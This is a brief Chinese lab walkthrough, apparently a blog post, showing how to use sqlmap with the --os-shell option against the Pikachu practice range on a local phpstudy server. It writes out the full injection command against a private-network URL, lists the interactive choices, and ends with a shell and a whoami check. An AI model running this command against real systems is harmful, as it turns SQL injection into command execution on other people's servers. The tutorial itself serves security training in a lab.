sqlmap (–os-shell)的使用
实验前的环境准备:
- 搭建phpstudy环境及pikachu靶场
- 保证kali可以正常访问pikachu靶场
使用kali访问pikachu靶场
以字符型注入(get)为例,随便输入一些信息,点击“查询”
使用sqlmap注入
python sqlmap.py -u "http://192.168.1.139/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --os-shell
可以尝试的注入方式
选择语言 4
您是否希望sqlmap进一步尝试激发完整的路径公开 Y
输入pikachu靶场的绝对路径 2
(自定义路径)![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/26f12c6b46f8444aae48e4a10ad046f9.png)
选择路径的四个选项解析
成功反弹shell
查看权限
whoami